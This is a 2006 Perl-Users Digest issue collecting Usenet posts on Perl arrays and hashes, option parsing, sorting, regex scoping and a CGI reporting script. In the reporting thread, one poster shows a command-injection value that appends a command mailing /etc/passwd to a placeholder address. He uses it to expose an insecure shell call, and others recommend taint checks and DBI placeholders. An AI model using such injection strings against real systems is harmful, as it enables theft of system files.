[28394] in Perl-Users-Digest
Perl-Users Digest, Issue: 9758 Volume: 10
daemon@ATHENA.MIT.EDU (Perl-Users Digest)
Sat Sep 23 18:05:59 2006
Date: Sat, 23 Sep 2006 15:05:06 -0700 (PDT)
From: Perl-Users Digest <Perl-Users-Request@ruby.OCE.ORST.EDU>
To: Perl-Users@ruby.OCE.ORST.EDU (Perl-Users Digest)
Perl-Users Digest Sat, 23 Sep 2006 Volume: 10 Number: 9758
Today's topics:
Re: An interactive interpreter/shell? <bik.mido@tiscalinet.it>
Re: differences between hashes and arrays ? <hjp-usenet2@hjp.at>
Re: differences between hashes and arrays ? <rvtol+news@isolution.nl>
Re: differences between hashes and arrays ? <bik.mido@tiscalinet.it>
Re: differences between hashes and arrays ? <bik.mido@tiscalinet.it>
Re: How identify if more than one option is specified? <rvtol+news@isolution.nl>
Re: How identify if more than one option is specified? <benmorrow@tiscali.co.uk>
Re: passing multiple values into an argument as an arra (reading news)
Re: passing multiple values into an argument as an arra usenet@DavidFilmer.com
Re: passing multiple values into an argument as an arra <bik.mido@tiscalinet.it>
Re: passing multiple values into an argument as an arra <nobull67@gmail.com>
Re: perl sort <honza@burdil.cz>
Re: perl sort <bik.mido@tiscalinet.it>
Re: perl sort <bik.mido@tiscalinet.it>
Re: perl sort <benmorrow@tiscali.co.uk>
Re: Russel Quong's "Perl in 20 pages" <bik.mido@tiscalinet.it>
submatch scoping in while <jcb@inf.ed.ac.uk>
Web Reporting Enhancement <pmcgover@gmail.com>
Re: Web Reporting Enhancement (Randal L. Schwartz)
Re: Web Reporting Enhancement <pmcgover@gmail.com>
Re: Web Reporting Enhancement <nobull67@gmail.com>
Re: Web Reporting Enhancement <nobull67@gmail.com>
Digest Administrivia (Last modified: 6 Apr 01) (Perl-Users-Digest Admin)
----------------------------------------------------------------------
Date: 23 Sep 2006 12:39:18 +0200
From: Michele Dondi <bik.mido@tiscalinet.it>
Subject: Re: An interactive interpreter/shell?
Message-Id: <2t0ah2htvsqampjqk40evddum72jib6mp2@4ax.com>
On 22 Sep 2006 13:46:39 -0700, "robb@acm.org" <robb@acm.org> wrote:
>Is there a shell out there that has functionality like Python's
>interactive interpreter? I've seen references to a few things out
Yes, but it has a strange name. It's called
perl -de42
>there (two different projects named psh?) But they don't look like
>they're currently being worked on, or are up to date.
That's a different thing, anyway.
Michele
--
{$_=pack'B8'x25,unpack'A8'x32,$a^=sub{pop^pop}->(map substr
(($a||=join'',map--$|x$_,(unpack'w',unpack'u','G^<R<Y]*YB='
.'KYU;*EVH[.FHF2W+#"\Z*5TI/ER<Z`S(G.DZZ9OX0Z')=~/./g)x2,$_,
256),7,249);s/[^\w,]/ /g;$ \=/^J/?$/:"\r";print,redo}#JAPH,
------------------------------
Date: Sat, 23 Sep 2006 09:11:40 +0200
From: "Peter J. Holzer" <hjp-usenet2@hjp.at>
Subject: Re: differences between hashes and arrays ?
Message-Id: <slrneh9nhc.d1.hjp-usenet2@yoyo.hjp.at>
On 2006-09-23 00:39, Chris Mattern <syscjm@sumire.eng.sun.com> wrote:
> In article <x77izvabiw.fsf@mail.sysarch.com>, Uri Guttman wrote:
>>hmm, in general arrays have faster lookups than hashes. me thinks you
>>confused the OP's statement. and arrays definitely use less storage
>>(even excluding the key itself) for each element.
>
> That's true in most languages because in most languages arrays
> are required to have all elements be the same type, making
> looking up an element a simple matter of pointer arithmetic
> (you see this in its most naked form in a higher-level language
> in C, where arrays and pointers are the same thing,
It seems people are just as confused about the difference between arrays
and pointers in C as they are about the difference between arrays and
lists in Perl :-)
Arrays and pointers in C are definitely not the same thing, An array is
a group of elements of the same type, while a pointer, well, points to
an element of a certain type. You notice the difference when you try to
assign to an array (doesn't work) or when you use sizeof on a pointer
(probably not what you wanted), and very spectacularly if you define a
variable as "int a[10]" in one source file and declare it as "extern int
*a" in another. However:
> and array lookups are defined in the language as pointer arithmetic.
This is true. (Actually it's the other way round: Pointer arithmetic is
defined in terms as accesses to array elements)
When you use an array as an rvalue in an expression, it is converted to
a pointer to its first element. Thus you can use an array as an rvalue
whereever you can use a pointer.
(There is also the syntactic quirk that you cannot use arrays as
parameters, but it's not an error to try - the compiler will just
silently convert the array declaration to a pointer declaration)
hp
--
_ | Peter J. Holzer | > Wieso sollte man etwas erfinden was nicht
|_|_) | Sysadmin WSR | > ist?
| | | hjp@hjp.at | Was sonst wäre der Sinn des Erfindens?
__/ | http://www.hjp.at/ | -- P. Einstein u. V. Gringmuth in desd
------------------------------
Date: Sat, 23 Sep 2006 15:11:50 +0200
From: "Dr.Ruud" <rvtol+news@isolution.nl>
Subject: Re: differences between hashes and arrays ?
Message-Id: <ef3itu.rg.1@news.isolution.nl>
Chris Mattern schreef:
> Jack:
>> why arent folks using hashes instead of arrays since (I believe) they
>> are faster to access and take up the same or less memory than
>> arrays..
>
> Um, no, arrays are much more efficient than hashes.
No, they are and they aren't. It all depends on what you use them for.
<example type="bad">
my %hary = (
0 => q{foo},
1 => q{bar},
) ;
my @ash = (
[q{dgd vggw ggg tgregdtg trgregfdsggt gtdeg trg}, q{foo}] ,
[q{wgdeg ergrewg rewgrew grewg ewg ewgew gewrgewg}, q{bar}] ,
) ;
</example>
--
Affijn, Ruud
"Gewoon is een tijger."
------------------------------
Date: 23 Sep 2006 20:23:52 +0200
From: Michele Dondi <bik.mido@tiscalinet.it>
Subject: Re: differences between hashes and arrays ?
Message-Id: <tvsah257pn39kl94iluiu18d3nl05melu7@4ax.com>
On 22 Sep 2006 10:01:50 -0700, "Jack" <jack_posemsky@yahoo.com> wrote:
>Michele Dondi wrote:
[snip]
>> --
>> {$_=pack'B8'x25,unpack'A8'x32,$a^=sub{pop^pop}->(map substr
>> (($a||=join'',map--$|x$_,(unpack'w',unpack'u','G^<R<Y]*YB='
>> .'KYU;*EVH[.FHF2W+#"\Z*5TI/ER<Z`S(G.DZZ9OX0Z')=~/./g)x2,$_,
>> 256),7,249);s/[^\w,]/ /g;$ \=/^J/?$/:"\r";print,redo}#JAPH,
Please do not top-quote. And in particular do not quote signatures.
>Thanks for the comments all. For these applications, which is better
>suited, array or hash, and assume a very large volume of data and
>consider memory :
>1- iterate through a huge list (hash or array?) of values and compare
No need for either a hash or an array. A list would suffice. But if
the list must be *stored* somewhere, then this somewhere would better
be an array.
>each value in the list, 1 by 1, to a match condition test like
>m/^\d.*?\d$/ (all digits), and then keep the count of the values that
>pass the match test
/^\d.*?\d$/ and $count++ for some_sub();
>2- compare all values in column 1, file 1 (one value at a time ; assume
>10M records ) to determine if the value exists in the target list (hash
>or array?) from column 2 file 2 (assume column 2 is 20M records)
I would certainly extract the records from "column 2 file 2" into a
hash (as keys, values do not really matter). Then I would scan file 1
line by line, extracting the wanted record to check for existence in
the hash. So as far as "column 1, file 1" is concerned and the
question is "hash or array?" the answer is "neither!"
Michele
--
{$_=pack'B8'x25,unpack'A8'x32,$a^=sub{pop^pop}->(map substr
(($a||=join'',map--$|x$_,(unpack'w',unpack'u','G^<R<Y]*YB='
.'KYU;*EVH[.FHF2W+#"\Z*5TI/ER<Z`S(G.DZZ9OX0Z')=~/./g)x2,$_,
256),7,249);s/[^\w,]/ /g;$ \=/^J/?$/:"\r";print,redo}#JAPH,
------------------------------
Date: 23 Sep 2006 20:23:53 +0200
From: Michele Dondi <bik.mido@tiscalinet.it>
Subject: Re: differences between hashes and arrays ?
Message-Id: <kurah25g84i5k2t2fcprsett53u3psdeaa@4ax.com>
On Sat, 23 Sep 2006 00:39:07 -0000, syscjm@sumire.eng.sun.com (Chris
Mattern) wrote:
>That's true in most languages because in most languages arrays
>are required to have all elements be the same type, making
>looking up an element a simple matter of pointer arithmetic
Again there are two issues here: the actual nature of a hash as a map
having a domain that is a somewhat generic set for as opposed to that
of that of an array from a special set, that has additional underlying
properties on the on hand and the corresponding implementation details
on the other one. Implementation details differ from language to
language, but it is intuitive that associative arrays will require a
sophisticated search algorithm and arrays due to their simpler, more
"natural" charachteristics, a straightforward lookup mechanism. Of
course these implementation details *do* matter even if not taken into
account in... ehm... detail. For otherwise "regular" arrays may be
implemented (if not at the syntactical level, at the semantical one)
in any sufficiently powerful language: it can certainly be done so in
Perl and thanks to tie() also very closely syntactically - but it
wouldn't be particularly useful nor interesting.
Michele
--
{$_=pack'B8'x25,unpack'A8'x32,$a^=sub{pop^pop}->(map substr
(($a||=join'',map--$|x$_,(unpack'w',unpack'u','G^<R<Y]*YB='
.'KYU;*EVH[.FHF2W+#"\Z*5TI/ER<Z`S(G.DZZ9OX0Z')=~/./g)x2,$_,
256),7,249);s/[^\w,]/ /g;$ \=/^J/?$/:"\r";print,redo}#JAPH,
------------------------------
Date: Sat, 23 Sep 2006 15:22:44 +0200
From: "Dr.Ruud" <rvtol+news@isolution.nl>
Subject: Re: How identify if more than one option is specified?
Message-Id: <ef3jgo.u4.1@news.isolution.nl>
Hemant Shah schreef:
> [Getopt::Std]
> Is there a easy way to find out if more than one option is
> specified.
Yes: allow only one option, with an argument (as David already said).
Of course there are many examples of popular executables with exclusive
global options, like the -E and -G of grep. In such case, the last one
should win.
--
Affijn, Ruud
"Gewoon is een tijger."
------------------------------
Date: Fri, 22 Sep 2006 20:58:33 +0100
From: Ben Morrow <benmorrow@tiscali.co.uk>
Subject: Re: How identify if more than one option is specified?
Message-Id: <9srdu3-ub3.ln1@osiris.mauzo.dyndns.org>
Quoth NoJunkMailshah@xnet.com:
>
> Is there a easy way to find out if more than one option is specified.
>
> Example:
>
> use Getopt::Std;
> getopts(abc);
> if ($opt_a || $opt_b || $opt_c) {}
>
> I only want user to specify one of the options (either -a or -b -or -c).
> How do I easily check if they have specified more than one option.
use Getopt::Declare;
my $args = Getopt::Declare->new(<<'OPTS');
-a Do some a-ish-type thing
-b Do some b-ish-type thing
-c Do some c-ish-type thing
[mutex: -a -b -c]
OPTS
# (note that there should be a literal tab after each -x)
# Ben
--
I must not fear. Fear is the mind-killer. I will face my fear and
I will let it pass through me. When the fear is gone there will be
nothing. Only I will remain.
benmorrow@tiscali.co.uk Frank Herbert, 'Dune'
------------------------------
Date: Sat, 23 Sep 2006 07:43:30 GMT
From: "Mumia W. (reading news)" <paduille.4058.mumia.w@earthlink.net>
Subject: Re: passing multiple values into an argument as an array ?
Message-Id: <CA5Rg.1370$o71.843@newsread3.news.pas.earthlink.net>
On 09/22/2006 10:43 PM, Jack wrote:
> hi folks,
>
> I am reading in arguments just fine using the code below, but I want to
>
> be able to add a variable number of values into an argument into perl -
>
> I want to be able to say
> perl -f value1 value2 ..valueN -v value value2 ..valueN
>
> and store the values of -f in a single array, and -v also (and the
> number of passed values could vary !)
>
> If anyone has any tips that would be great - Thanks, Jack
>
> if (@ARGV[0] eq undef) {
> $value1=@ARGV[0];
> }
> if (@ARGV[1] eq undef) {
> $value2=@ARGV[1];
>
See if you can find a delimiter character for the values so that you can
use this syntax: perl -f value1,value2,..valueN -v value,value2,..valueN
Then it becomes very easy:
use strict;
use warnings;
use Data::Dumper;
use Getopt::Std;
my (%opts);
getopts ('f:v:',\%opts);
foreach my $value (values %opts) {
$value = [ split /,/, $value ];
}
print Dumper(\%opts);
--
paduille.4058.mumia.w@earthlink.net
------------------------------
Date: 23 Sep 2006 01:23:23 -0700
From: usenet@DavidFilmer.com
Subject: Re: passing multiple values into an argument as an array ?
Message-Id: <1158999803.843092.45910@m73g2000cwd.googlegroups.com>
Jack wrote:
[a multiposted question]
Don't multipost. It's rude.
--
David Filmer (http://DavidFilmer.com)
------------------------------
Date: 23 Sep 2006 12:39:19 +0200
From: Michele Dondi <bik.mido@tiscalinet.it>
Subject: Re: passing multiple values into an argument as an array ?
Message-Id: <g51ah2pbkkam5l7cbttqsjonqdnjptmpm6@4ax.com>
On 22 Sep 2006 20:43:51 -0700, "Jack" <jack_posemsky@yahoo.com> wrote:
>I want to be able to say
>perl -f value1 value2 ..valueN -v value value2 ..valueN
>
>and store the values of -f in a single array, and -v also (and the
>number of passed values could vary !)
You DON'T want that. You want
perl yourscript -f whatever -v whatever
Just use Getopt::* and invent a sensible "format" for whatever, i.e.
comma separated or value separated, and then parse whatever
accordingly, i.e. just split() it.
Michele
--
{$_=pack'B8'x25,unpack'A8'x32,$a^=sub{pop^pop}->(map substr
(($a||=join'',map--$|x$_,(unpack'w',unpack'u','G^<R<Y]*YB='
.'KYU;*EVH[.FHF2W+#"\Z*5TI/ER<Z`S(G.DZZ9OX0Z')=~/./g)x2,$_,
256),7,249);s/[^\w,]/ /g;$ \=/^J/?$/:"\r";print,redo}#JAPH,
------------------------------
Date: 23 Sep 2006 07:38:10 -0700
From: "Brian McCauley" <nobull67@gmail.com>
Subject: Re: passing multiple values into an argument as an array ?
Message-Id: <1159022290.075194.13430@b28g2000cwb.googlegroups.com>
usenet@DavidFilmer.com wrote:
> [a multiposted question]
>
> Don't multipost. It's rude.
Now I think you are being too terse. At least say
Don't multipost. It's rude. See http://....
> David Filmer (http://DavidFilmer.com)
I went there and found a statement "There is nothing on this website,
and there are no plans to ever have any content here" and a link to
another page on the same website. Can I just say "huh?". :-)
------------------------------
Date: Sat, 23 Sep 2006 08:58:26 +0200
From: "Jan Burdil" <honza@burdil.cz>
Subject: Re: perl sort
Message-Id: <ef2lv0$30r3$1@ns.felk.cvut.cz>
this command cort the output, but not good
ls -l |sort -k 1.37
drwx------ 2 honza users 512 Aug 22 10:54 mail
-rwx------ 1 honza users 54 Jun 14 11:29 aa
-rwx------ 1 honza users 832 Sep 5 19:35 yy
-rwx------ 1 honza users 52 May 31 21:54 bb
...
Jan Burdil
<usenet@DavidFilmer.com> wrote in message
news:1158969197.100768.214850@h48g2000cwc.googlegroups.com...
> Jan Burdil wrote:
>
>> my files are sorted by date. And I need to sort lines from curl command.
>> curl ftp://1.1.1.1 give me
>
> Somtimes the shell way is the easier way. for example:
>
> ls -l |sort -k 1.37
>
> (see also the -t flag of sort)
>
> --
> David Filmer (http://DavidFilmer.com)
>
------------------------------
Date: 23 Sep 2006 12:39:12 +0200
From: Michele Dondi <bik.mido@tiscalinet.it>
Subject: Re: perl sort
Message-Id: <d70ah21t30ub0bp10tgl55su6d0tt4i3kv@4ax.com>
On Fri, 22 Sep 2006 21:22:55 +0200, "Jan Burdil" <honza@burdil.cz>
wrote:
>Subject: perl sort
Not at all!
>how can I replace * with some command like cat file, ls -l in line
>
>perl -e 'print join "\n", sort { -M $b <=> -M $a } <*>,"\n"'
s/*//; # but then no need for join "\n" etc.
and just either pipe into the command, or give an argument of 'ls
-1|'. (Yes, but... why?!?)
^^^^^^^^^^^^^^^^^^
^^^^^^^^^^^^^^^^^^
Michele
--
{$_=pack'B8'x25,unpack'A8'x32,$a^=sub{pop^pop}->(map substr
(($a||=join'',map--$|x$_,(unpack'w',unpack'u','G^<R<Y]*YB='
.'KYU;*EVH[.FHF2W+#"\Z*5TI/ER<Z`S(G.DZZ9OX0Z')=~/./g)x2,$_,
256),7,249);s/[^\w,]/ /g;$ \=/^J/?$/:"\r";print,redo}#JAPH,
------------------------------
Date: 23 Sep 2006 12:39:17 +0200
From: Michele Dondi <bik.mido@tiscalinet.it>
Subject: Re: perl sort
Message-Id: <7i0ah21huugreaj0oa1m9kau8s055oqskg@4ax.com>
On Fri, 22 Sep 2006 22:24:30 +0200, "Jan Burdil" <honza@burdil.cz>
wrote:
>perl -e 'print join "\n", sort { -M $b <=> -M $a } <*>,"\n"'
[snip]
>my files are sorted by date. And I need to sort lines from curl command.
>curl ftp://1.1.1.1 give me
>-rw-r--r-- 1 honza users 414 Sep 22 12:16 curl.txt
>-rwx------ 1 honza users 52 May 31 21:54 bb
>drwx------ 2 honza users 512 Aug 22 10:54 mail
>
>And I would like the result to be sorted by date.
Dwimmeries do not extend so far as "understanding" one's confusion
about a filename referring to an actual file which has some actual
timestamps and a string containing date/time specifications...
Just abandon all hope ye^W^W^W-M altogether and use a date/time
parsing module to obtain something to sort() on. Or else and more
reasonably, abandon curl altogether and use a module that will
retrieve the remote files' timestamps directly.
Michele
--
{$_=pack'B8'x25,unpack'A8'x32,$a^=sub{pop^pop}->(map substr
(($a||=join'',map--$|x$_,(unpack'w',unpack'u','G^<R<Y]*YB='
.'KYU;*EVH[.FHF2W+#"\Z*5TI/ER<Z`S(G.DZZ9OX0Z')=~/./g)x2,$_,
256),7,249);s/[^\w,]/ /g;$ \=/^J/?$/:"\r";print,redo}#JAPH,
------------------------------
Date: Fri, 22 Sep 2006 21:06:00 +0100
From: Ben Morrow <benmorrow@tiscali.co.uk>
Subject: Re: perl sort
Message-Id: <8asdu3-ub3.ln1@osiris.mauzo.dyndns.org>
Quoth "Jan Burdil" <honza@burdil.cz>:
> Subject: perl sort
Please use a sensible Subject. You question has nothing to do with
sorting.
> how can I replace * with some command like cat file, ls -l in line
>
> perl -e 'print join "\n", sort { -M $b <=> -M $a } <*>,"\n"'
You can skip the last "\n" by adding a -l to your commandline.
You can skip the join by putting
$, = "\n";
before the print statement, though that's arguably no simpler in this
case.
Read the section on qx in perldoc perlop.
Alternatively, you can probably do what you want from within Perl,
without calling an external command.
Ben
--
#!/bin/sh
quine="echo 'eval \$quine' >> \$0; echo quined"
eval $quine
# [benmorrow@tiscali.co.uk]
------------------------------
Date: 23 Sep 2006 12:39:11 +0200
From: Michele Dondi <bik.mido@tiscalinet.it>
Subject: Re: Russel Quong's "Perl in 20 pages"
Message-Id: <glv9h2tj27no9agdbdqortke8re2kqnus3@4ax.com>
On Fri, 22 Sep 2006 16:26:38 -0400, Uri Guttman <uri@stemsystems.com>
wrote:
>i recall all of those. but this guy's comments on arrays and lists being
>the same since the docs say so is as bad as any of those others. the
>absolute certainty of his comments are hysterical. but the only way to
>truly judge these tutes is to make up a page of links, reviews and
>quotes. a worthy project. maybe i will make it a wiki so we can all join
>in.
Just another Hall of Shame!
Michele
--
{$_=pack'B8'x25,unpack'A8'x32,$a^=sub{pop^pop}->(map substr
(($a||=join'',map--$|x$_,(unpack'w',unpack'u','G^<R<Y]*YB='
.'KYU;*EVH[.FHF2W+#"\Z*5TI/ER<Z`S(G.DZZ9OX0Z')=~/./g)x2,$_,
256),7,249);s/[^\w,]/ /g;$ \=/^J/?$/:"\r";print,redo}#JAPH,
------------------------------
Date: Sat, 23 Sep 2006 21:14:28 +0100
From: Julian Bradfield <jcb@inf.ed.ac.uk>
Subject: submatch scoping in while
Message-Id: <e6codt6nxwb.fsf@palau.inf.ed.ac.uk>
Consider the following:
@x = ( 'aaa','bbb');
while ( $x[$i] !~ /^(.)b/ && $i <= $#x ) { $i++; }
print "\$1 is *$1*, i is $i\n";
The loop terminates at $i == 1 when 'bbb' matches ^(.)b
The enclosing block for the match construct is the whole file.
Therefore $1 should be 'b'.
But it isn't (in Perl 5.8.5).
What am I missing?
Compare
@x = ( 'aaa','bbb');
if ( $x[$i] !~ /^(.)a/ && $i <= $#x ) { $i++; }
print "\$1 is *$1*, i is $i\n";
which behaves as expected.
------------------------------
Date: 23 Sep 2006 05:55:23 -0700
From: "pmcgover@gmail.com" <pmcgover@gmail.com>
Subject: Web Reporting Enhancement
Message-Id: <1159016123.818211.172640@i42g2000cwa.googlegroups.com>
I enjoyed Paul Barry's September article in Linux Journal entitled,
"Web Reporting with MySQL, CSS and Perl". It provides a simple,
elegant way to use HTML to display database content without any sql
markup in the cgi script. The cgi script simply calls the Mysql
command line with the HTML option (-H) and the SQL script file directed
to that command. This provides complete separation of the markup from
the sql code. The plain vanila HTML output can be spruced up with CSS
to provide more color and size control of the HTML.
This model could be much more powerful if you could pass an SQL query
parameter from the user to the sql script. I attempted this by
substituting the string "p_1" in the where clause of the sql code but I
could not substitute this string with the value in the cgi code (ie.
$query =~ s/p_1/value_variable/;).
Any ideas how this could be made to work? Would it be a security
issue, or is it still possible to "taint" the user input value?
Thanks!
Below is a link to the article:
http://delivery.acm.org/10.1145/1160000/1152907/8281.html?key1=1152907&key2=9804109511&coll=ACM&dl=ACM&CFID=15151515&CFTOKEN=6184618
------------------------------
Date: 23 Sep 2006 06:54:05 -0700
From: merlyn@stonehenge.com (Randal L. Schwartz)
To: "pmcgover@gmail.com" <pmcgover@gmail.com>
Subject: Re: Web Reporting Enhancement
Message-Id: <86fyeiit8i.fsf@blue.stonehenge.com>
>>>>> "pmcgover@gmail" == pmcgover@gmail com <pmcgover@gmail.com> writes:
pmcgover@gmail> Any ideas how this could be made to work? Would it be a security
pmcgover@gmail> issue, or is it still possible to "taint" the user input value?
pmcgover@gmail> Thanks!
pmcgover@gmail> Below is a link to the article:
pmcgover@gmail> http://delivery.acm.org/10.1145/1160000/1152907/8281.html?key1=1152907&key2=9804109511&coll=ACM&dl=ACM&CFID=15151515&CFTOKEN=6184618
Egad! This guy has NO CLUE about security:
my $query = param( 'query' );
my $title = param( 'title' );
The script then creates the command line that runs the query through the MySQL client program. Note that Perl's dot operator is used to concatenate strings:
my $cmdline = MYSQL .
' -H -u ' .
USERID .
' -p' .
PASSWD .
' ' .
DBNAME .
"< $query ";
What if param('query') contains:
"whocares; mail merlyn@example.com </etc/passwd";
Idiot. People without clues should NOT be writing articles.
print "Just another Perl hacker,"; # the original
--
Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 0095
<merlyn@stonehenge.com> <URL:http://www.stonehenge.com/merlyn/>
Perl/Unix/security consulting, Technical writing, Comedy, etc. etc.
See PerlTraining.Stonehenge.com for onsite and open-enrollment Perl training!
--
Posted via a free Usenet account from http://www.teranews.com
------------------------------
Date: 23 Sep 2006 07:16:48 -0700
From: "pmcgover@gmail.com" <pmcgover@gmail.com>
Subject: Re: Web Reporting Enhancement
Message-Id: <1159021008.559150.51310@k70g2000cwa.googlegroups.com>
Thanks Radal,
> Egad! This guy has NO CLUE about security:
>
> my $query = param( 'query' );
> my $title = param( 'title' );
Did you read the tainting code at the bottom of the article? ....
$query =~ /^([-\w]+\.sql)$/;
$query = $1;
$title =~ /^([\w:.?! ]+)$/;
$title = $1;
I did some tests and I thought it worked as intended. Anyway, do you
have any ideas how to do the enhancement I mentioned earlier?
Pat
Randal L. Schwartz wrote:
> >>>>> "pmcgover@gmail" == pmcgover@gmail com <pmcgover@gmail.com> writes:
>
> pmcgover@gmail> Any ideas how this could be made to work? Would it be a security
> pmcgover@gmail> issue, or is it still possible to "taint" the user input value?
> pmcgover@gmail> Thanks!
>
> pmcgover@gmail> Below is a link to the article:
> pmcgover@gmail> http://delivery.acm.org/10.1145/1160000/1152907/8281.html?key1=1152907&key2=9804109511&coll=ACM&dl=ACM&CFID=15151515&CFTOKEN=6184618
>
> Egad! This guy has NO CLUE about security:
>
> my $query = param( 'query' );
> my $title = param( 'title' );
>
> The script then creates the command line that runs the query through the MySQL client program. Note that Perl's dot operator is used to concatenate strings:
>
> my $cmdline = MYSQL .
> ' -H -u ' .
> USERID .
> ' -p' .
> PASSWD .
> ' ' .
> DBNAME .
> "< $query ";
>
> What if param('query') contains:
>
> "whocares; mail merlyn@example.com </etc/passwd";
>
> Idiot. People without clues should NOT be writing articles.
>
> print "Just another Perl hacker,"; # the original
>
> --
> Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 0095
> <merlyn@stonehenge.com> <URL:http://www.stonehenge.com/merlyn/>
> Perl/Unix/security consulting, Technical writing, Comedy, etc. etc.
> See PerlTraining.Stonehenge.com for onsite and open-enrollment Perl training!
>
> --
> Posted via a free Usenet account from http://www.teranews.com
------------------------------
Date: 23 Sep 2006 07:21:51 -0700
From: "Brian McCauley" <nobull67@gmail.com>
Subject: Re: Web Reporting Enhancement
Message-Id: <1159021311.154459.212910@e3g2000cwe.googlegroups.com>
pmcgover@gmail.com wrote:
> This model could be much more powerful if you could pass an SQL query
> parameter from the user to the sql script. I attempted this by
> substituting the string "p_1" in the where clause of the sql code but I
> could not substitute this string with the value in the cgi code (ie.
> $query =~ s/p_1/value_variable/;).
> Below is a link to the article:
> http://delivery.acm.org/....
In that article the variable $query contains the _name_of_a_file_ that
contains the SQL statement.
You are talking about trying to apply subsitutions to an SQL statement
in $query.
You either have signficantly different code from that in the article or
you are seriously confused.
> Any ideas how this could be made to work?
You could read in the SQL template in, pass it wthough some sort of
templating engine (the simplest just being your s///), write it out
again to a named temporary file then use that filename in the qx//.
Just to be clear, I said you _could_ do this. You could also plunge
your hand into a deep fat frier. Neither of these are courses of action
I'd recommend.
Abondon the extreamly dubious technique of using qx// to call a command
line SQL tool and use DBI (or one of the DBIx modules) and placeholders
like everyone else.
> Would it be a security issue
If you need to ask you really should not be contemplating this course.
------------------------------
Date: 23 Sep 2006 07:27:51 -0700
From: "Brian McCauley" <nobull67@gmail.com>
Subject: Re: Web Reporting Enhancement
Message-Id: <1159021671.139156.242470@e3g2000cwe.googlegroups.com>
Randal L. Schwartz wrote:
> my $cmdline = MYSQL .
> ' -H -u ' .
> USERID .
> ' -p' .
> PASSWD .
> ' ' .
> DBNAME .
> "< $query ";
>
> What if param('query') contains:
>
> "whocares; mail merlyn@example.com </etc/passwd";
I think you'll find the author went on to make that exact same point in
order to illustrate the importance of tainting and laundering.
------------------------------
Date: 6 Apr 2001 21:33:47 GMT (Last modified)
From: Perl-Users-Request@ruby.oce.orst.edu (Perl-Users-Digest Admin)
Subject: Digest Administrivia (Last modified: 6 Apr 01)
Message-Id: <null>
Administrivia:
#The Perl-Users Digest is a retransmission of the USENET newsgroup
#comp.lang.perl.misc. For subscription or unsubscription requests, send
#the single line:
#
# subscribe perl-users
#or:
# unsubscribe perl-users
#
#to almanac@ruby.oce.orst.edu.
NOTE: due to the current flood of worm email banging on ruby, the smtp
server on ruby has been shut off until further notice.
To submit articles to comp.lang.perl.announce, send your article to
clpa@perl.com.
#To request back copies (available for a week or so), send your request
#to almanac@ruby.oce.orst.edu with the command "send perl-users x.y",
#where x is the volume number and y is the issue number.
#For other requests pertaining to the digest, send mail to
#perl-users-request@ruby.oce.orst.edu. Do not waste your time or mine
#sending perl questions to the -request address, I don't have time to
#answer them even if I did know the answer.
------------------------------
End of Perl-Users Digest V10 Issue 9758
***************************************
